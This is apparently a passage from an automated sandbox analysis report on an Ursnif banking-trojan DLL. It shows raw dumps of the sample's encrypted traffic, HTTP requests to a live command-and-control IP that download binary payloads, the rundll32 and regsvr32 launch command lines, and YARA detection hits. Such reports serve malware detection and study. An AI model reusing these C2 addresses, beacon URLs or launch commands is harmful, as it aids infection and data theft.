1b 91 d8 0c 02 6b 60 96 ca 7c 5b 3f f2 0e 4e e1 a6 3a 7d a3 b6 31 11 ca 38 ad 77 4f 69 88 5b d8 dc 1c 50 fc 43 23 dd 4f 28 ab 4b 83 97 d9 83 86 37 d4 35 ee de 1e ed 9f 4b dd 00 a3 72 52 c7 27 04 4d 81 eb e9 ec 96 aa f9 2e 3f 42 c9 06 71 55 3b ac 74 d6 c3 51 95 7c a9 88 a1 29 cd 87 8b 8d 91 80 c2 27 be 0a 9a 79 c4 71 2f 66 cd 0d 8f ea 0b 71 9c 31 65 9c b4 71 c7 83 db 73 ef 97 72 58 6b ec 28 a0 a2 3d 78 f2 60 48 bd de f7 4d 89 e4 48 56 c7 c7 33 40 4f cd 43 22 8e e4 4d 45 8d 73 df 8f 3b 90 ff 56 18 e1 52 36 d5 ad bd 2c e6 ab d4 98 46 02 74 39 79 e3 9d 17 d0 64 90 67 45 46 51 f1 67 82 66 1f 8c 5d 2f d4 55 75 55 00 e1 f5 7d bc b1 1d dc e3 cb 0d 0f 1d 20 b2 78 4b 19 50 9b 9d 80 05 ad 82 b1 4a 3d a9 c6 8d db f6 d1 40 f3 1a 7f 08 ee 73 12 77 8d f0 26 11 a9 d2 b2 53 5f cd 10 a7 56 ee 93 fb 29 64 a4 0d 0c 5a b7 dd f2 4d d8 ac d3 2e 26 e7 8b 9b 7a b8 46 13 e9 c5 1c a2 84 04 46 b6 03 bc dc 61 89 60 bc 13 9e 91 fa d6 f3 ea 0d 74 f1 38 9b 17 fd 5a 50 d8 4f 55 d3 bd f2 87 17 1a 66 8d 83 19 72 7f 9a 6d 49 86 65 84 7a 01 74 85 b2 c3 1d 24 dd 41 ae c5 26 a2 88 c2 f8 ee 1f 8b 69 75 6d 97 da 41 2d 1c 40 fb 6c 84 ee 4e cc e2 be 87 77 6e 71 f8 6c c4 5c 80 74 ca 68 f2 43 f6 3b ab 9d e3 3a 5f d2 44 73 0e be 3b 81 44 26 a5 16 3f 25 ba af e4 df 06 9c 06 17 77 74 07 91 08 54 dd 3d 33 1d 89 0b 05 11 e2 e7 cc 35 63 3d 83 27 fc 18 6e 35 dc 0e 03 ac 48 0e c6 06 d7 2c fe 39 2e 2a a3 29 3c ed c6 e5 88 ea bc 33 77 d9 07 43 16 a8 a3 36 e1 64 5a 40 a3 c8 50 1f fc a8 1d dc 70 3f 8f 91 29 e5 46 82 3a 29 d0 07 c8 e2 80 2b f0 30 a3 39 18 0e b1 c8 d9 db 90 7d 26 dd 91 2f f6 8e 45 3e 1b 26 e1 6f 5b 1f 0b f1 b9 12 d0 62 7e 46 46 19
              Data Ascii: 4Jov0m"OX4ZRbLx"5a;L1hvW{S]}PNWz6xNfl+y0a6Jc[rO+he8W1x6ZdGM_X:gY(82A*Sw |&Q>~nZOU(8ebh9Ts}HozoGf72ET8Z9X.!p~2$VqOK"hL^wPW6M("]p}M{sZdUQ89|^e5bHcOmWP'{jq<=Q>0u _.2[j4{/I(+k`|[?N:}18wOi[PC#O(K75KrR'M.?BqU;tQ|)'yq/fq1eqsrXk(=x`HMHV3@OC"MEs;VR6,Ft9ydgEFQgf]/UuU} xKPJ=@sw&S_V)dZM.&zFFa`t8ZPOUfrmIezt$A&iumA-@lNwnql\thC;:_Ds;D&?%wtT=35c='n5H,9.*)<3wC6dZ@Pp?)F:)+09}&/E>&o[b~FF
              Jan 26, 2022 10:28:13.898988008 CET2601INData Raw: 41 1e fe e1 f1 ae a3 57 10 dd a0 5a ca b8 50 30 d7 31 ea b4 01 7d c2 91 09 08 ce 9b d1 e6 ae 6c fd 9e da 16 2a 6a 80 64 7f 63 cb 76 b1 e5 70 b3 4b ee ae 74 a8 07 13 22 4b 4d e3 26 0a 0e bb b8 51 ea 8f 9e 44 a0 8d 09 23 0d 24 94 39 77 f8 a2 f1 be
              Data Ascii: AWZP01}l*jdcvpKt"KM&QD#$9w"rh=EMw Xxc0~QSmdo8-3eehDx9p1;xt0ccU_n9G~X$$Z~W/sQwI9R:(Ka>k
              Jan 26, 2022 10:28:13.899009943 CET2603INData Raw: 0a ca f3 c8 64 af b7 9c 50 26 44 70 2c 49 ff fe 67 7c 2b 05 27 83 9d ca d1 41 18 02 0a 1a 69 be 8a 10 be 39 ff 50 5e cb 38 a1 51 e9 b8 25 c3 da 00 ce b2 d3 11 05 ff ac ef cd 0f 59 9b ac 6d e0 09 ff 46 68 14 b7 81 d5 da 21 d7 10 14 ba f5 d7 a3 71
              Data Ascii: dP&Dp,Ig|+'Ai9P^8Q%YmFh!q%KNZ6uFY-]_;D[V`>l0&}Lc{+%L9",~uGKU/N^lNw3b3HU/]0e:$A}D"KJ
              Jan 26, 2022 10:28:13.899025917 CET2604INData Raw: ca 39 82 32 ae 72 18 43 1c dd fd 9b ed f6 51 8d ab c6 11 93 a3 20 6e 4b 45 a0 05 a1 80 3f 8d 61 0c 33 55 27 ba 6c 58 57 e5 a2 d4 6a f3 b3 69 e0 3e 0d bb 52 e4 78 c8 75 a6 a1 3c c3 1b 3b d0 ab c4 67 e2 1f 96 3e fb 45 87 8a a9 92 b9 41 ab 64 84 02
              Data Ascii: 92rCQ nKE?a3U'lXWji>Rxu<;g>EAda!i6MT%s9WBIRn<mywgVS*;N+0Ne"D+4`_8K7{g<T<FJ. 7H/=}
              Jan 26, 2022 10:28:13.899054050 CET2606INData Raw: 2f da e6 93 1c a7 c9 16 59 cf 4e 4e ad 91 65 c2 8a da 4b be d1 0c bc de 95 69 0b 8a 07 73 b2 86 1d cf 52 a3 44 c3 a2 5d 4a 22 1c c1 7c 10 9d 26 f5 e4 e3 96 0f 93 73 85 b6 92 35 64 27 a7 d9 16 0d 58 c3 ff 09 4c c5 6f 63 9a ce 1a 10 a7 b6 d1 97 58
              Data Ascii: /YNNeKisRD]J"|&s5d'XLocX'|RQy4MoPg37L_>2dZ}5xNYg'uP]YgH8+6uwHZ@F,D]y]4-d5VpBmKK
              Jan 26, 2022 10:28:13.899070024 CET2607INData Raw: 2b 1d da c2 1d 24 4b f5 b5 ea a5 b2 62 ea 22 a0 72 b6 c7 3a cd dd 7a a3 b2 48 b4 c1 0a 16 9b b3 2b b2 92 14 9d f2 6d 4b 94 43 6a 10 36 cf 56 b9 06 d7 99 90 a6 6d 24 a6 71 8b 1c 56 02 7c 48 0e 94 7c 42 8a 13 68 47 5f 9a 99 f1 fa 2a 72 3a 87 da 1c
              Data Ascii: +$Kb"r:zH+mKCj6Vm$qV|H|BhG_*r:!>QBE.}fS.%;$-<*@_yV1aio /{-0D<mzC.HRto.N,/UjV#|G=XHjpG>Kt<]B
              Jan 26, 2022 10:28:13.899094105 CET2607INData Raw: 3a 5c 45 2a fe db 99 e8 c3 fe 61 44 7a e7 f7 ef 0c 17 e0 d7 65 eb e4 80 70 32 e8 72 16 e7 dd 93 ba b3 f2 d4 b3 1a 70 b9 04 67 92 ab 70 29 f5 4b 2b d9 ad 6d 6f f5 a9 5a 41 33 14 50 da f9 d4 2e 7b 4f 8e 4b 43 d8 b4 b6 22 42 53 b1 f2 70 6d c6 53 59
              Data Ascii: :\E*aDzep2rpgp)K+moZA3P.{OKC"BSpmSYfXo|u_vMGht\mu0QRNuegGi|r45!Z2EYoa5n)
              Jan 26, 2022 10:28:13.899243116 CET2609INData Raw: 1f 46 dd 39 6a e7 ee f5 53 dc 9b 06 ac 90 d4 3b 67 ae 1b c1 52 b2 50 76 d3 e8 37 e1 a6 db 59 88 06 5a 11 85 02 ec 0d ea 01 33 81 bf e6 76 e2 96 d7 26 1d f3 32 ab 6c 59 68 42 c2 e1 f6 80 ba bc 63 e4 e6 31 d8 7a 89 b4 fa a7 59 58 62 d8 c3 4e fd d9
              Data Ascii: F9jS;gRPv7YZ3v&2lYhBc1zYXbNIbt]rDxY3-vmua{eiwcU3){_+r$1B|2iR?}_.B`T>1KR8K vvw%/yN+@|cxgR
              Jan 26, 2022 10:28:13.899261951 CET2610INData Raw: 98 2c d9 b4 4e f3 68 58 f9 0e ab 80 69 3b ef 41 53 03 60 a4 6f 2d ca b3 91 be f8 e0 06 cc 2b 9c 3e 70 83 bb 26 bb db b3 f9 4d 08 88 74 1c e6 4f d7 36 2b 72 01 1e d8 a8 7d cc 2e 91 a2 b1 ba 25 8b 83 40 cf fe 89 83 9a 85 e6 ad 57 67 3e 26 a7 36 1d
              Data Ascii: ,NhXi;AS`o-+>p&MtO6+r}.%@Wg>&6`8~ZCs?O23d!,!w(E3AHNc+xYw!3't3-!Rs;~p)T9;yEu\A>;CR%2f=`A
              Jan 26, 2022 10:28:13.899363041 CET2612INData Raw: c1 88 d1 4b d7 fa 8f 60 1a a7 4c fd 83 e2 de 6d 85 53 29 12 be f7 e5 8f 0f 90 6a 0b 0c 82 3f f7 5d 96 02 48 71 95 08 d4 66 07 a7 a6 a4 e6 f5 8f 84 21 7c 96 8f d6 c2 65 10 44 84 a6 d9 01 2d 90 3a 9d e2 8b 40 6e d9 c3 bb 1a 50 65 80 f1 e7 5f c0 3a
              Data Ascii: K`LmS)j?]Hqf!|eD-:@nPe_:42\)%uu{{d\{x<J/InJ<0%GWc(x8aHH:grs'w9Xf>C"+F/3"csi\gy4uJ!iZj[
              Jan 26, 2022 10:28:13.919245005 CET2613INData Raw: 4e 21 85 2d 19 14 20 8f a4 df 90 16 75 d9 f0 db 92 b5 d1 99 25 b8 71 b8 e2 fb 02 95 4f 85 58 01 6b 41 c7 e0 22 cc 72 ea f2 cf 73 8c 2a 89 cb 20 26 2c cf 12 a2 8f 4a 58 5c 42 41 94 c1 af dd 3f b5 a7 a7 54 2b e7 54 b9 1c 3c 4c 42 5e 50 ee 5a 8d 04
              Data Ascii: N!- u%qOXkA"rs* &,JX\BA?T+T<LB^PZwk~x,GH'dlyndS\>znPtx]<`N__N2J<'$8J@"`Z30E:Z68IwQPc1ypYKq,4yZYY"D!s@Yu \rx5<{
              Jan 26, 2022 10:28:14.677802086 CET2816OUTGET /drew/qj8KFpDyUAB/xQ_2FW_2FRVQUR/xo7UR19sTv1fTteFGwviu/H1QAugjBS9BAganl/OqUmHFdTh92Mttp/bKzDAO3E0N_2BxZ1ow/sTpBKLA2p/6BUrMhtfsbHTEuRLWcq7/jTbARM2BAFwOLbLtYBa/i_2BLCetjq8jqUWnEo5XCb/sLP1ktID7e6VC/G3BV6Vkb/N29_2BJlXZ2HReVfDXYWlEP/mt9DueL_2F/NgPtBNn5wZiJtUInd/fWiE7TY0/hCY.jlk HTTP/1.1
              Cache-Control: no-cache
              Connection: Keep-Alive
              Pragma: no-cache
              User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 10.0)
              Host: 194.76.226.200
              Jan 26, 2022 10:28:14.955522060 CET2817INHTTP/1.1 200 OK
              Server: nginx/1.18.0 (Ubuntu)
              Date: Wed, 26 Jan 2022 09:28:14 GMT
              Content-Type: application/octet-stream
              Content-Length: 262298
              Connection: keep-alive
              Pragma: public
              Accept-Ranges: bytes
              Expires: 0
              Cache-Control: must-revalidate, post-check=0, pre-check=0
              Content-Disposition: inline; filename="61f1142ee57c1.bin"
              Data Raw: bc 58 44 2d 3f 69 1c 31 6f 19 ce bd 43 f0 20 48 2f a8 05 9b 0e 7a 3e 20 f1 f5 39 03 5c ec 25 14 47 ca 20 58 0c 21 39 da 11 c2 cf 7d ea e9 bd e0 29 31 a9 65 5b 07 36 21 bc bd 3c 8d 80 a7 96 dd 76 86 90 74 45 b9 fa 0c 05 46 10 a3 e9 f0 9a 00 ca 11 6e 65 f9 dd 9d 9e 33 63 61 96 0d 7f bc 6d 8d a8 fa 74 5b 85 1f 03 07 2f 96 87 82 0b c0 50 5b e2 9b 0f 15 ef 3a 18 83 ed 78 e9 24 bd d5 50 65 eb d4 69 41 35 6c 8b 36 81 b0 b7 83 87 f2 99 9c dc 14 4c 1a 9e 39 2a 93 cb 6a 9f b7 da 70 12 ff f3 e9 54 c1 a0 da e7 c8 3b cd 2b 9e 48 f8 94 94 82 5c 2e 01 04 3b ba cd a4 44 0b d1 57 48 d1 40 8a 69 00 8a 79 dd 8d 7f 68 fe db 65 87 08 d5 9d 19 70 c1 d2 12 63 26 8d b8 8f eb e2 d4 f6 0c 7d bc 55 af 67 0e 49 6d 0e b0 bd d1 80 06 ea 38 2b 65 3b 8e 6a 76 d7 f7 89 2e 85 0a c9 be b2 8c 42 42 4f 7b 28 2c 6d 27 b9 7b cc 91 47 6f 1f 88 98 1e 3e d4 28 68 c2 c6 76 65 3d 09 3a a5 72 b4 46 f1 e0 d2 94 e7 57 7c e8 19 8c 31 83 ce 83 e7 97 ce 0d 51 ff c2 23 5d df 8e 64 07 b2 10 d9 cf 61 82 c5 34 79 bc fd f2 a6 c1 4e ef 21 d0 c9 a8 a5 ac 9c ad c4 94 e9 f2 fb a7 38 f6 f7 3f ce 80 69 78 cd 93 be d3 de a3 10 69 6a 51 2d 59 9a 13 e0 53 b1 6f 72 a4 e1 7f b3 90 b1 fc d9 aa 59 bc 59 97 82 64 99 0b ac a8 04 bd 04 4c b6 24 de 0d 53 fe 01 a3 13 6e d8 22 78 59 53 fe 95 18 0c 81 d7 5f 8a cd 05 69 1c 65 4a 9b 24 46 06 ac fb 49 9d de 37 60 ae ee c6 6b 29 02 6c 0e a1 3b e0 0e 43 a4 1b 5b 9b c0 e8 8d 54 45 de 9a d1 7b 85 30 17 70 2e 5e fa d1 ea 55 b7 09 4a 45 19 fd 62 7d d2 c2 37 e1 59 70 cb cb f0 59 12 f6 21 3d f8 f7 9e e0 e8 e5 02 1e 2a 2d a8 96 a4 77 f2 5a 2a ef d7 3e 65 47 a9 bb 0f ac db c5 65 7c 27 de b3 3a c9 4a 7a f7 24 47 cf f8 cd e4 d7 14 66 55 28 59 d9 9a d7 12 6e a0 84 de a0 76 b4 cc c5 48 c8 d7 da ed f3 f6 89 a3 23 08 7a d6 31 49 1b e9 e7 f5 6d ad ef 63 c9 09 43 4d d4 6e 47 18 ac 32 2b 65 3e 82 1d 23 61 ac 1b a2 06 be 9d 19 7b 20 df cf 5a 03 ac 9d 11 d3 47 69 f2 af ce 4b ad a1 ef 2b fc 8e 36 0b db d3 e8 4b cd 90 d7 c4 92 08 94 9b ae 29 f1 7f 1c f8 80 24 55 8b 13 76 d8 9f 21 95 73 57 a8 e4 ad be 38 75 6d fc 51 42 da 45 01 ce be a8 8e bf 1c 27 2d 78 d4 11 a5 de 6d 95 43 00 61 1a 51 12 77 fa b9 66 a5 85 6e 81 9b e4 d6 d3 38 f2 eb 8f 6f 53 50 e7 b4 4f a0 f6 69 88 5b 7b c9 03 a4 02 a7 22 52 c6 cd ec d7 dd 58 53 72 01 a5 ea 13 88 ee ef 11 74 a2 bb a7 5a c3 df 31 00 6b ae a5 2c 3e 2d ae 96 ac 4e 83 f7 22 7b 95 a1 31 5a 5d cb ec cc 1a 30 9a c8 2e c3 ed d6 0e fe 52 10 aa d4 ef 89 c6 37 cf fa cd ec c6 8e 8b 1c 5c 25 7c fd 28 86 e8 72 01 b6 e2 94 96 0a 71 4f 83 2d 17 55 15 40 67 58 d8 63 b4 d1 ac 11 2e 37 21 1c 87 20 31 1f 0c 46 58 bb bd ac 41 e6 de 27 05 ca 9c 2d 48 d8 ef 9a e1 71 92 d6 32 99 0d 05 06 b5 45 8e 7a b5 1d b6 89 fa 46 1a e3 d4 79 21 b8 92 e5 c3 80 40 10 5d 85 c8 10 a5 41 c9 0e c6 a2 34 a1 fe b9 e0 85 93 9e 82 3e cc a0 69 a9 d5 7e 1e c3 f2 3f 74 9c 1f 33 20 ec 8f 5a 4f bb 8f 8f e7 42 99 ac 96 ae b4 51 30 56 2f 40 53 32 2f 92 bf 80 4d e5 84 a4 7d bb 6d 96 8c e2 2f 32 c1 b2 a3 da dc 2f fc c6 e4 ea 5b 7c 88 44 b3 05 8f d6 94 0f 25 19 c3 c4 c4 0b 74 37 12 d5 4d ac 86 2b 00 39
              Data Ascii: XD-?i1oC H/z> 9\%G X!9})1e[6!<vtEFne3camt[/P[:x$PeiA5l6L9*jpT;+H\.;DWH@iyhepc&}UgIm8+e;jv.BBO{(,m'{Go>(hve=:rFW|1Q#]da4yN!8?ixijQ-YSorYYdL$Sn"xYS_ieJ$FI7`k)l;C[TE{0p.^UJEb}7YpY!=*-wZ*>eGe|':Jz$GfU(YnvH#z1ImcCMnG2+e>#a{ ZGiK+6K)$Uv!sW8umQBE'-xmCaQwfn8oSPOi[{"RXSrtZ1k,>-N"{1Z]0.R7\%|(rqO-U@gXc.7! 1FXA'-Hq2EzFy!@]A4>i~?t3 ZOBQ0V/@S2/M}m/2/[|D%t7M+9
              Jan 26, 2022 10:28:16.546865940 CET3093OUTGET /drew/GVxzdEn3rJxHPgJaE/ckcbKS4onbSJ/ZdlWFtgOHAM/pJGsS1vTtWNP8h/yNsXRCxcvAA6AXQPJwabF/oYnH6redQswcAwtL/rDlMsMT_2FoiQ_2/BdNrJdcFdtJq9vsrPj/Pi_2B3_2B/dnsHU70OV9c4KUJyE_2F/0ip_2FIZ7Wqza0Ho2lN/KYodlnq6PG5KK9SBFWXHj5/viPS4jjPVWzpA/_2B2JOAM/KOBPUpSnsG9auoSxo_2BhjX/PvM1mRJl_2/FaBIYOp1w1wVY3Kqd/ZfinCIlH/i.jlk HTTP/1.1
              Cache-Control: no-cache
              Connection: Keep-Alive
              Pragma: no-cache
              User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 10.0)
              Host: 194.76.226.200
              Jan 26, 2022 10:28:16.817614079 CET3094INHTTP/1.1 200 OK
              Server: nginx/1.18.0 (Ubuntu)
              Date: Wed, 26 Jan 2022 09:28:16 GMT
              Content-Type: application/octet-stream
              Content-Length: 1800
              Connection: keep-alive
              Pragma: public
              Accept-Ranges: bytes
              Expires: 0
              Cache-Control: must-revalidate, post-check=0, pre-check=0
              Content-Disposition: inline; filename="61f11430c2f61.bin"
              Data Raw: f7 46 fb 9e 69 b9 56 c0 85 b5 3c ae 3e aa 33 38 35 5a 64 d6 52 bc 42 12 16 86 d3 f7 ff 19 25 a1 c8 72 2b cd 25 8a 0f 08 f0 2e e4 61 ba 42 9d 9e ee 3c 23 65 bb 49 f2 14 21 9d 9f bb f8 74 45 7d af 3c 4f 96 e8 0c 62 35 ae 13 55 7f f4 5b 3e ec 33 8a 5f 02 aa 2c bb 78 58 74 91 ef b2 91 fc 07 b1 e7 58 01 16 72 83 2b 7e 5a 2e 22 8b 9a 65 0b d7 79 6e 0d e7 28 15 6a e8 b1 91 82 21 54 f1 42 d4 5c ed 5a 9c ad ca f0 37 09 c3 4d 66 b4 a8 3a bf 34 89 96 61 91 fe 08 92 fa 9f 07 60 20 f9 72 77 bb 00 7e de 0d c5 36 8a 15 d9 0b d3 65 62 da dc bf de 5f 75 31 c8 2c 19 59 bb a0 b5 1d cd 5a 5f a9 ef 87 62 5a b8 2f ac b2 11 ba 5a 0e 85 47 da bb e7 69 e5 5a c5 8c 7e 71 4d cc 84 0c ca 20 e6 fc ea e1 ae 33 29 98 ea 7b 38 ab f4 89 e3 49 13 e8 f4 12 e2 b3 55 2c 03 e7 b0 71 4f 4c c1 67 d4 2f 4e 58 7a 5c 7c c7 91 c9 1f fb a9 00 72 7d 9e aa ed 09 bb e1 ea 33 18 c0 d8 95 2f c5 62 25 0b 77 08 41 79 0e 45 9e d9 2b fe e2 ff e7 46 c5 3c 9c 66 88 d2 65 6f d2 88 5a d0 b6 ad 21 b8 01 78 29 d4 8a 06 b1 40 40 bf d5 3d f3 f2 e8 5a fd c5 52 a6 bc 72 a5 1d e9 fe ff 88 56 52 a7 51 8c 13 e5 cb c9 d4 8b 03 7f bb 74 fb ac d1 e1 00 d2 40 cc 15 62 fd 28 ae d8 34 fd 56 dd 6c 02 c9 38 19 2f ff df ce c5 7b 74 cc 44 3d 9c 38 ea 8d 3a 35 f4 c4 01 79 8e 45 d4 c5 dd 89 51 09 7b 3a eb c5 23 9a c6 b6 24 68 77 a9 fb b9 ae c7 ad ae 82 05 1d 78 53 91 a8 80 31 28 10 54 42 2d 2b 6d 56 81 77 61 22 86 c5 47 fa 9a 53 8d bd 63 91 d5 01 a2 1c 33 70 53 45 62 7e 67 68 c2 25 eb 66 32 05 09 0b 79 d2 23 03 03 d2 3a f3 73 e2 c6 5f a8 02 78 b2 d6 5a 2e 24 6e f7 81 5d c4 a4 f2 1e ac 17 c2 eb 88 10 41 7d 02 c7 f9 c0 47 f5 73 8f 0c 15 77 09 27 50 3f 4d fe 7e 88 cb 97 9f 1f 67 28 83 81 84 a1 4b cc 96 e8 d8 2d 77 d2 a0 35 fc 5c c9 39 b0 32 79 1a 79 fb 68 7b 42 34 f4 a9 bb bc 44 6d 8c 97 71 2c 08 c7 8b d8 96 27 1e ed 11 b0 15 a2 16 73 18 fa 7b 31 dc d6 47 5a 83 a7 86 a5 91 84 19 02 d8 99 1f dd 25 a2 3e ee 3a 57 9f 14 d7 0b 14 b4 c3 2e 0c 9c 1c 82 eb ef 3f 79 73 0a 6b c1 1f ff bd 61 83 96 43 15 24 7d 24 26 68 20 d0 0c 3a 69 57 e7 84 4e 04 45 00 39 98 a6 0a 32 41 54 26 8d 78 f2 ab 3b 20 7c b5 42 eb 10 e5 6b 44 e5 f5 9a be d3 42 f8 16 75 bc 5c 2e e0 33 7b cd cd 80 de 28 00 da 8d 26 0e cd 12 fc df be f4 7e 62 e2 1f c9 41 c2 50 74 c5 ac 31 fe 87 d6 9a bf 2a 3b fb 54 1d 7c e4 24 56 54 21 51 52 66 d7 68 04 3e 8a 5e 97 4c fb 60 8d 6f 65 19 9a f8 b0 c4 e0 21 62 ae 1b 91 96 d0 e9 64 c9 94 39 68 9b bd ef 96 5f 8c 09 32 26 fd 16 ee f6 a3 da 2f e8 a6 e4 d5 3f 8b f0 32 ce cb bf 75 ae d3 3a 63 3b eb 80 90 73 e7 ec 24 40 94 f0 a9 2f b8 db d8 33 c3 16 a7 2f fe eb cf 3b 01 f2 b1 51 9b 60 07 8c 7b 63 93 44 26 8d b7 ef 24 46 1b 61 71 a9 6a eb 5b 7f 79 93 d7 d1 7e 0d ca f6 93 48 e2 b2 3b 0f 6f 05 94 5d 16 58 25 ef ea e5 ff 5b e9 01 84 71 a3 4b 17 20 2a 79 0f 12 7b 26 ff bd d7 56 cb 30 91 35 69 4b 0a b1 34 12 d6 cf d7 54 01 1a 9e f1 32 69 9c 1d 55 46 91 fb b5 55 b9 fc 09 6b c8 ae 5c 74 ed 69 bb fe 85 58 bc cd 3d 88 e1 f0 b3 4f cf 7b e6 41 a2 f0 7c 6f 76 01 1a 14 33 47 5c aa e1 b8 3d c9 81 d6 dc 23 8d 90 12 a3 b9 e1 ed 50 ab 0e 1b d9 f3 45
              Data Ascii: FiV<>385ZdRB%r+%.aB<#eI!tE}<Ob5U[>3_,xXtXr+~Z."eyn(j!TB\Z7Mf:4a` rw~6eb_u1,YZ_bZ/ZGiZ~qM 3){8IU,qOLg/NXz\|r}3/b%wAyE+F<feoZ!x)@@=ZRrVRQt@b(4Vl8/{tD=8:5yEQ{:#$hwxS1(TB-+mVwa"GSc3pSEb~gh%f2y#:s_xZ.$n]A}Gsw'P?M~g(K-w5\92yyh{B4Dmq,'s{1GZ%>:W.?yskaC$}$&h :iWNE92AT&x; |BkDBu\.3{(&~bAPt1*;T|$VT!QRfh>^L`oe!bd9h_2&/?2u:c;s$@/3/;Q`{cD&$Faqj[y~H;o]X%[qK *y{&V05iK4T2iUFUk\tiX=O{A|ov3G\=#PE


              Statistics

              CPU Usage

              Click to jump to process

              Memory Usage

              Click to jump to process

              High Level Behavior Distribution

              Click to dive into process behavior distribution

              Behavior

              Click to jump to process

              System Behavior

              General

              Target ID:1
              Start time:10:27:39
              Start date:26/01/2022
              Path:C:\Windows\System32\loaddll32.exe
              Wow64 process (32bit):true
              Commandline:loaddll32.exe "C:\Users\user\Desktop\61f113091fd0c.dll"
              Imagebase:0xb20000
              File size:116736 bytes
              MD5 hash:7DEB5DB86C0AC789123DEC286286B938
              Has elevated privileges:true
              Has administrator privileges:true
              Programmed in:C, C++ or other language
              Yara matches:
              • Rule: JoeSecurity_Ursnif, Description: Yara detected Ursnif, Source: 00000001.00000003.313620006.0000000002178000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
              • Rule: JoeSecurity_Ursnif, Description: Yara detected Ursnif, Source: 00000001.00000003.419223881.0000000004C98000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
              • Rule: JoeSecurity_Ursnif, Description: Yara detected Ursnif, Source: 00000001.00000003.357803374.0000000002178000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
              • Rule: JoeSecurity_Ursnif, Description: Yara detected Ursnif, Source: 00000001.00000003.416632245.0000000004C98000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
              • Rule: JoeSecurity_Ursnif, Description: Yara detected Ursnif, Source: 00000001.00000003.419462428.0000000004C98000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
              • Rule: JoeSecurity_Ursnif, Description: Yara detected Ursnif, Source: 00000001.00000003.313789835.0000000002178000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
              • Rule: JoeSecurity_Ursnif, Description: Yara detected Ursnif, Source: 00000001.00000003.416948546.0000000004C98000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
              • Rule: JoeSecurity_Ursnif, Description: Yara detected Ursnif, Source: 00000001.00000003.418907434.0000000004C98000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
              • Rule: JoeSecurity_Ursnif, Description: Yara detected Ursnif, Source: 00000001.00000003.418190503.0000000004C98000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
              • Rule: JoeSecurity_Ursnif, Description: Yara detected Ursnif, Source: 00000001.00000003.418488620.0000000004C98000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
              • Rule: JoeSecurity_Ursnif, Description: Yara detected Ursnif, Source: 00000001.00000003.313081553.0000000002178000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
              • Rule: JoeSecurity_Ursnif, Description: Yara detected Ursnif, Source: 00000001.00000003.312190736.0000000002178000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
              • Rule: JoeSecurity_Ursnif, Description: Yara detected Ursnif, Source: 00000001.00000003.419037087.0000000004C98000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
              • Rule: SUSP_LNK_SuspiciousCommands, Description: Detects LNK file with suspicious content, Source: 00000001.00000002.511490355.000000000134C000.00000004.00000020.00020000.00000000.sdmp, Author: Florian Roth
              • Rule: JoeSecurity_Ursnif, Description: Yara detected Ursnif, Source: 00000001.00000003.359673745.0000000001F7C000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
              • Rule: JoeSecurity_Ursnif, Description: Yara detected Ursnif, Source: 00000001.00000003.312479873.0000000002178000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
              • Rule: JoeSecurity_Ursnif, Description: Yara detected Ursnif, Source: 00000001.00000003.313276698.0000000002178000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
              • Rule: JoeSecurity_Ursnif, Description: Yara detected Ursnif, Source: 00000001.00000003.313441363.0000000002178000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
              • Rule: JoeSecurity_Ursnif, Description: Yara detected Ursnif, Source: 00000001.00000003.312864720.0000000002178000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
              • Rule: JoeSecurity_Ursnif, Description: Yara detected Ursnif, Source: 00000001.00000003.419113309.0000000004C98000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
              Reputation:high

              General

              Target ID:2
              Start time:10:27:39
              Start date:26/01/2022
              Path:C:\Windows\SysWOW64\cmd.exe
              Wow64 process (32bit):true
              Commandline:cmd.exe /C rundll32.exe "C:\Users\user\Desktop\61f113091fd0c.dll",#1
              Imagebase:0xd80000
              File size:232960 bytes
              MD5 hash:F3BDBE3BB6F734E357235F4D5898582D
              Has elevated privileges:true
              Has administrator privileges:true
              Programmed in:C, C++ or other language
              Reputation:high

              General

              Target ID:3
              Start time:10:27:40
              Start date:26/01/2022
              Path:C:\Windows\SysWOW64\regsvr32.exe
              Wow64 process (32bit):true
              Commandline:regsvr32.exe /s C:\Users\user\Desktop\61f113091fd0c.dll
              Imagebase:0x290000
              File size:20992 bytes
              MD5 hash:426E7499F6A7346F0410DEAD0805586B
              Has elevated privileges:true
              Has administrator privileges:true
              Programmed in:C, C++ or other language
              Yara matches:
              • Rule: JoeSecurity_Ursnif, Description: Yara detected Ursnif, Source: 00000003.00000003.365747529.0000000005608000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
              • Rule: JoeSecurity_Ursnif, Description: Yara detected Ursnif, Source: 00000003.00000003.318724371.0000000005608000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
              • Rule: JoeSecurity_Ursnif, Description: Yara detected Ursnif, Source: 00000003.00000003.319004486.0000000005608000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
              • Rule: JoeSecurity_Ursnif, Description: Yara detected Ursnif, Source: 00000003.00000003.318536421.0000000005608000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
              • Rule: JoeSecurity_Ursnif, Description: Yara detected Ursnif, Source: 00000003.00000003.318886527.0000000005608000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
              • Rule: JoeSecurity_Ursnif, Description: Yara detected Ursnif, Source: 00000003.00000003.318950101.0000000005608000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
              • Rule: JoeSecurity_Ursnif, Description: Yara detected Ursnif, Source: 00000003.00000003.318813278.0000000005608000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
